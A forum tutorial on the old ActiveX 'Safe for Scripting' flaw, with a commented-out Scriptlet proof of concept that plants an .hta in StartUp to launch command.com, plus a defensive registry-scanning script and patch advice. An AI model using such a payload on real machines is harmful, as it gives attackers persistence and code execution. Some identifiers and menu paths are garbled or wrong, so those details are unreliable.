It's been quite some time since I visited this site. Well... It's now or never. Time to make a comeback with a little tute.

Let's get to the point....

Most of us here know ActiveX, Microsoft's OLE (Object Linking and Embedding) based component technology for Internet browsers. But can anyone think of a way in which it can be used to hijack data? Well, let me introduce you to the sins of ActiveX.

Let me just introduce you to ActiveX first. The main feature of ActiveX that makes it vulnerable is its capability of client side execution: the control is native code that runs on the user's machine with the user's own privileges, with no sandbox around it. ActiveX and Java are two of the very few technologies that use client side execution.

This is how ActiveX works. ActiveX controls have the extension .ocx (except those written in Java). These objects are embedded into the web page using the <object> tag, which specifies the properties of the control and also the location on the internet from which it can be fetched. When the user visits a web page with ActiveX controls, the browser first checks whether the control is already registered in the registry. If not, it downloads the control, checks its Authenticode signature (coming up) and then executes it. By default the controls are downloaded into the \windows\occache directory. This is where the fun begins: breaking the browser's security and hopping the Authenticode hurdle.

Microsoft's Authenticode paradigm is what permits downloaded controls to be executed. It is a cryptographic code-signing mechanism: the publisher signs the control with a certificate issued by a third party certificate authority (usually VeriSign), and the browser verifies that signature before installing the control. Note that a valid signature only tells you who published the control, not that the control is safe to run.

Let's begin with the bugs. Yeah yeah, I'm sorry to bug you with the boring part. But hey, it's over.

ActiveX "Safe for Scripting Issue"

ActiveX controls are usually harmless. But controls like Scriptlet and Eyedog are rather irritating. Scriptlet has the capability to reach into the user's local filesystem, where it can create, edit and overwrite files. Eyedog can read your registry.
Using these two controls, one can create Armageddon (I've probably spelled it wrong).

This Safe for Scripting issue was published by Georgi Guninski in 1999. If you want a taste of this script visit http://www.guininsky.com/scrtlb.html . When I say a taste of the code, I MEAN a taste of the code. Anyway, what the code does is very simple: it creates a .hta file in the StartUp folder of the Start menu, so every time you restart the computer a message pops up. The code goes something like this:

Code:
//<object id="scr" classid="clsid:06290BDS-48AA-11D2-8432-006008C3FBFC">
//</object>

//<SCRIPT>
//scr.reset();
//scr.path="C:\\windows\\Start Mnu\\Programs\\StartUp\\guiniski.hta";
//scr.doc="<object id='wsh' clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>
//</object>
//<SCRIPT>
//alert('Written by George Guininski');
//wsh.run('C:\\command.com');
//</"+"SCRIPT>;
//scr.write();
//</SCRIPT>
//</object>
Registered ActiveX controls can be marked as "Safe for Scripting" either by implementing the IObjectSafety interface within the control or by marking them as safe in the registry, by adding the category key {7DD95801-9882-11CF-9FA9-00AA006C42C4} under the Implemented Categories subkey of the control's CLSID. Either mark tells the browser it may let any web page script the control without prompting, so a control that can touch the filesystem or the registry should never carry it.

Can you just imagine how many such components your system uses actively?
Go to Start -> Run -> dcomcnfg.
You'll be shocked at the number of registered ActiveX controls.
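To find out which of those controls carry the Safe for Scripting mark described above, here is an added example (my own script, not Guninski's code or anything from the post) that parses a registry export (reg export HKCR\CLSID clsid.reg, decoded from UTF-16 to text) and lists every CLSID whose Implemented Categories contain the category GUID quoted above. The sample export and its CLSIDs are constructed placeholders, and CATID_SAFE_FOR_INIT is the companion Safe for Initializing category, which the post does not mention.

```python
import re

# Category GUID that marks a control "Safe for Scripting" (quoted in the post);
# the sibling GUID is the "Safe for Initializing" category (not in the post).
CATID_SAFE_FOR_SCRIPTING = "7DD95801-9882-11CF-9FA9-00AA006C42C4"
CATID_SAFE_FOR_INIT = "7DD95802-9882-11CF-9FA9-00AA006C42C4"

# Key header, e.g. [HKEY_CLASSES_ROOT\CLSID\{guid}\Implemented Categories\{catid}]
KEY_RE = re.compile(r"^\[HKEY_CLASSES_ROOT\\CLSID\\\{([0-9A-Fa-f-]{36})\}(?:\\(.*))?\]$")
CAT_RE = re.compile(r"^Implemented Categories\\\{([0-9A-Fa-f-]{36})\}$")


def parse_reg_export(text: str) -> dict:
    """Map CLSID -> {"name": friendly name, "categories": set of CATIDs}."""
    controls: dict = {}
    entry, subkey = None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            clsid, subkey = m.group(1).upper(), m.group(2) or ""
            entry = controls.setdefault(clsid, {"name": "", "categories": set()})
            cm = CAT_RE.match(subkey)
            if cm:
                entry["categories"].add(cm.group(1).upper())
        elif entry is not None and subkey == "" and line.startswith('@="'):
            entry["name"] = line[3:-1]  # default value of the CLSID key is the friendly name
    return controls


def scriptable_controls(text: str) -> dict:
    """CLSID -> name for every control a web page may script without any prompt."""
    return {c: e["name"] for c, e in parse_reg_export(text).items()
            if CATID_SAFE_FOR_SCRIPTING in e["categories"]}


# Constructed sample export (not a real system dump); the CLSIDs are placeholders.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\\CLSID\\{00000000-0000-0000-0000-000000000001}]
@="Constructed Safe Control"

[HKEY_CLASSES_ROOT\\CLSID\\{00000000-0000-0000-0000-000000000001}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\\CLSID\\{00000000-0000-0000-0000-000000000002}]
@="Constructed Unsafe Control"
"""

if __name__ == "__main__":
    for clsid, name in scriptable_controls(SAMPLE_REG).items():
        print(f"{{{clsid}}}  {name}  -> marked Safe for Scripting, review it")
```

On a real export, compare the names it prints against what each control can actually do (file or registry access, process launching); any such control in the list is a candidate for removal or patching.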

Remember, the Eyedog control is only vulnerable if you're using Office 2000. I suppose it has been rectified in XP.

Avoiding the Safe for Scripting issue:

Three measures are to be taken in order to protect yourself:

Step 1:

Get the relevant patches for Scriptlet/Eyedog from http://www.microsoft.com/technet/sec...n/ms99-032.asp
and http://www.office.microsoft.com/down.../Uactlsec.aspx respectively.
But these patches do not provide protection against "accidental Trojans". "Accidental Trojans" are nothing but loopholes not yet found: other controls marked safe for scripting that turn out not to be.

Step 2:

Change the macro security level in all the Office apps (there is no global setting) to Maximum:
Tools | Macro | Security in Office 2000.

Step 3:

This is the most prominent and desperate step you can take. If you don't want to use ActiveX at all, just disable it:
Tools | Internet Options | Security | Custom Level | Disable Macros.
As simple as that, and no more ActiveX attacks.

Man, I'm beat. I never thought one vulnerability would take this much. I've got a few more to go. Maybe some other time.
Till then, Sayonara